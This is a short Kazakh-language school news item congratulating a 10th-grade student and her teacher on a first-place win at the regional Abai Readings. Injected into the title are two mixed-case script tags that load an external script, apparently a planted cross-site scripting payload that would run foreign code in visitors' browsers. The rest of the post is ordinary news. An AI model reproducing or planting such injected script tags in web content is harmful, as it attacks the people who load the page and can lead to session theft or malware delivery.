Абай оқулары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.05.2022 12 мамыр күні өткен облыстық Абай оқуларына Иманжүсіп Құтпанұлы атындағы жалпы орта білім беретін мектебінен 10 сынып оқушысы, аудандық кезеңнің жүлдегері Сағантай Зинеп қатысты. «Абай оқуларының» мақсаты – оқушылардың бойындағы өнерге деген сүйіспеншілікті ояту, ақындық, шешендік қабілеттерін дамыту, талантты оқушыларды аудан, облыс, республика деңгейінде танытып, ынталандыру. «Жүйріктен жүйрік озар жарысқанда» номинациясы бойынша қатысқан Сағантай Зинеп жүлделі 1 орынға ие болып, республикалық кезеңге жолдама алды. Жетекшісі қазақ тілі мен әдебиеті пәнінің мұғалімі Хусайн Ханат. Жеңімпаз оқушы мен жетекшісін жеңісімен құттықтаймыз! Болашақта тек биіктерден көріне беріңіздер! Директордың ғылыми-әдістеме ісі жөніндегі орынбасары: Абдрахманова А.Е.
Просмотров: 407


Пікір қосу



Деректерді қолтаңбаға қосу